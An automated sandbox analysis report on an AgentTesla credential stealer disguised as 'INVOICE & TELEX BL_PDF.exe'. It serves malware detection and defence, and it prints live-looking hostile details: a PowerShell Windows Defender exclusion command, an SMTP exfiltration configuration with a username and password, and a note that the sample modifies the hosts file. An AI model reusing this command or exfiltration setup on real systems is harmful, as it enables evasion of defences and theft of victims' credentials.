
Windows Analysis Report INVOICE & TELEX BL_PDF.exe

Overview

General Information

Sample Name: INVOICE & TELEX BL_PDF.exe
Analysis ID: 491534
MD5: 22a2657bb48e3303f6f0a0fd1fdfe441
SHA1: d6a230a732f3d691a7fce60081f30627ffabd33d
SHA256: 85627117b351e81655bb56b947b61a198d195a225db0e002ef476460b9f273ac
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Defender Exclusion
.NET source code contains very large strings
Adds a directory exclusion to Windows Defender
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • INVOICE & TELEX BL_PDF.exe (PID: 6708 cmdline: 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe' MD5: 22A2657BB48E3303F6F0A0FD1FDFE441)
    • powershell.exe (PID: 6256 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • INVOICE & TELEX BL_PDF.exe (PID: 5028 cmdline: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe MD5: 22A2657BB48E3303F6F0A0FD1FDFE441)
    • INVOICE & TELEX BL_PDF.exe (PID: 5728 cmdline: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe MD5: 22A2657BB48E3303F6F0A0FD1FDFE441)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "slot2@zfftcn.com", "Password": "*VNHf^L9", "Host": "smtp.zfftcn.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000001.00000002.315990604.00000000035C1000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000001.00000002.315990604.00000000035C1000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000007.00000002.554063789.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000007.00000002.554063789.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security

Unpacked PEs

Source | Rule | Description | Author
1.2.INVOICE & TELEX BL_PDF.exe.26185cc.1.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
7.2.INVOICE & TELEX BL_PDF.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
7.2.INVOICE & TELEX BL_PDF.exe.400000.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
1.2.INVOICE & TELEX BL_PDF.exe.37c7e90.3.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
1.2.INVOICE & TELEX BL_PDF.exe.37c7e90.3.raw.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security

Sigma Overview

System Summary:

Sigma detected: Powershell Defender Exclusion
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe' , ParentImage: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe, ParentProcessId: 6708, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe', ProcessId: 6256
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe' , ParentImage: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe, ParentProcessId: 6708, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe', ProcessId: 6256
Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132772619685794460.6256.DefaultAppDomain.powershell

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 1.2.INVOICE & TELEX BL_PDF.exe.36986b0.4.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "slot2@zfftcn.com", "Password": "*VNHf^L9", "Host": "smtp.zfftcn.com"}
Multi AV Scanner detection for submitted file
Source: INVOICE & TELEX BL_PDF.exe | Virustotal: Detection: 37%
Source: INVOICE & TELEX BL_PDF.exe | ReversingLabs: Detection: 33%
Source: 7.2.INVOICE & TELEX BL_PDF.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: INVOICE & TELEX BL_PDF.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: INVOICE & TELEX BL_PDF.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49826 -> 208.91.199.225:587
Source: Joe Sandbox View | IP Address: 208.91.199.225
Source: global traffic | TCP traffic: 192.168.2.3:49826 -> 208.91.199.225:587
Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmp | String found in binary or memory: http://Dmxfln.com
Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmp, INVOICE & TELEX BL_PDF.exe, 00000007.00000003.522926739.00000000012A4000.00000004.00000001.sdmp, INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557862224.00000000033EC000.00000004.00000001.sdmp | String found in binary or memory: http://Dsl8ffzBvoWnMQBLSV.net
Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.290170876.0000000005656000.00000004.00000001.sdmp | String found in binary or memory: http://en.w
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.289878864.0000000005673000.00000004.00000001.sdmp | String found in binary or memory: http://en.wikipediaHWV
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557817796.00000000033DD000.00000004.00000001.sdmp | String found in binary or memory: http://smtp.zfftcn.com
Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557817796.00000000033DD000.00000004.00000001.sdmp | String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp, INVOICE & TELEX BL_PDF.exe, 00000001.00000003.292202005.0000000005657000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.296581005.000000000565D000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.297199473.000000000565E000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comF
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.296524959.000000000565C000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comR.TTF
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.301053046.0000000005657000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comT
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.300428403.0000000005657000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.coma
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.297973029.000000000565C000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comals
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.296860370.000000000565C000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comalsF
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.296524959.000000000565C000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comasTF
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.300428403.0000000005657000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comce
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.301053046.0000000005657000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comcoma
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.296581005.000000000565D000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comituF
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.296524959.000000000565C000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comx
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.291343756.0000000005657000.00000004.00000001.sdmp, INVOICE & TELEX BL_PDF.exe, 00000001.00000003.291477234.0000000005657000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.291403933.0000000005658000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn1
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.291343756.0000000005657000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnL
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.291477234.0000000005657000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnv-s_
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.293939695.000000000565D000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.293939695.000000000565D000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/%
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.293939695.000000000565D000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.292953266.000000000565B000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/oby
Source: INVOICE & TELEX BL_PDF.exe | String found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.290081835.000000000566B000.00000004.00000001.sdmp, INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.290081835.000000000566B000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.comtf
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.293857674.0000000005684000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%$
Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.315990604.00000000035C1000.00000004.00000001.sdmp, INVOICE & TELEX BL_PDF.exe, 00000007.00000002.554063789.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | DNS traffic detected: queries for: smtp.zfftcn.com

Spam, unwanted Advertisements and Ransom Demands:

Modifies the hosts file
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | File written: C:\Windows\System32\drivers\etc\hosts

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: INVOICE & TELEX BL_PDF.exe
                      Source: initial sampleStatic PE information: Filename: INVOICE & TELEX BL_PDF.exe
                      .NET source code contains very large stringsShow sources
                      Source: INVOICE & TELEX BL_PDF.exe, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
                      Source: 1.2.INVOICE & TELEX BL_PDF.exe.2a0000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
                      Source: 1.0.INVOICE & TELEX BL_PDF.exe.2a0000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
                      Source: 6.0.INVOICE & TELEX BL_PDF.exe.420000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
                      Source: 6.2.INVOICE & TELEX BL_PDF.exe.420000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
                      Source: 7.0.INVOICE & TELEX BL_PDF.exe.cb0000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
                      Source: INVOICE & TELEX BL_PDF.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 1_2_0246C1941_2_0246C194
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 1_2_0246E5E01_2_0246E5E0
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 1_2_0246E5F01_2_0246E5F0
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_012756607_2_01275660
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_0127B9087_2_0127B908
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_01276C4C7_2_01276C4C
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_014741087_2_01474108
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_014788D07_2_014788D0
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_014778F87_2_014778F8
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_01470D607_2_01470D60
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_0147ADD07_2_0147ADD0
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_0147E86A7_2_0147E86A
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_01472A367_2_01472A36
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_01472FD07_2_01472FD0
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_01475E087_2_01475E08
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_0150B9007_2_0150B900
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_0150D9DA7_2_0150D9DA
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_015060307_2_01506030
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_0150025A7_2_0150025A
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_015072007_2_01507200
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000000.287593997.0000000000370000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWindowsIdenti.exe4 vs INVOICE & TELEX BL_PDF.exe
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameColladaLoader.dll4 vs INVOICE & TELEX BL_PDF.exe
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameIzDMlWzDsqkQJGmrjtpXNzhyRQszW.exe4 vs INVOICE & TELEX BL_PDF.exe
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.315990604.00000000035C1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs INVOICE & TELEX BL_PDF.exe
                      Source: INVOICE & TELEX BL_PDF.exe, 00000006.00000000.310876714.00000000004F0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWindowsIdenti.exe4 vs INVOICE & TELEX BL_PDF.exe
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.554736809.0000000001138000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs INVOICE & TELEX BL_PDF.exe
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000000.311902776.0000000000D80000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWindowsIdenti.exe4 vs INVOICE & TELEX BL_PDF.exe
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.554063789.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameIzDMlWzDsqkQJGmrjtpXNzhyRQszW.exe4 vs INVOICE & TELEX BL_PDF.exe
                      Source: INVOICE & TELEX BL_PDF.exeBinary or memory string: OriginalFilenameWindowsIdenti.exe4 vs INVOICE & TELEX BL_PDF.exe
                      Source: INVOICE & TELEX BL_PDF.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: INVOICE & TELEX BL_PDF.exeVirustotal: Detection: 37%
                      Source: INVOICE & TELEX BL_PDF.exeReversingLabs: Detection: 33%
                      Source: INVOICE & TELEX BL_PDF.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe'
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess created: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess created: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess created: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess created: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INVOICE & TELEX BL_PDF.exe.logJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jek5pvp.a5z.ps1Jump to behavior
                      Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@8/6@2/1
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6480:120:WilError_01
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
